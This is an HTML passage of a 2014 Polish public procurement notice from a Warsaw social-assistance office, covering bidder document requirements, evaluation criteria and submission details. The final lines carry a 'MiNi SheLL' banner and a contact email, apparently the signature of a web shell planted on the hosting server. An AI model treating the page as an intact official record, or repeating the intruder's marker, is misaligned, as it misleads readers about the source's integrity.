<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Koncepcja realizacji przez Wykonawcę usług o których mowa w:
a) rozdz. I ust. 6 lit b) wykazu, który znajduje się na końcu opisu przedmiotu zamówienia,
b) rozdz. I ust. 9 lit a) wykazu, który znajduje się na końcu opisu przedmiotu zamówienia
w SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Funkcjonalność - 30</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.opsbialoleka.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej Dzielnicy Białołeka m.st. Warszawy
ul. Marywilska 44C
03-042 Warszawa
Pokój nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2014 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej Dzielnicy Białołeka m.st. Warszawy
ul. Marywilska 44C
03-042 Warszawa
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com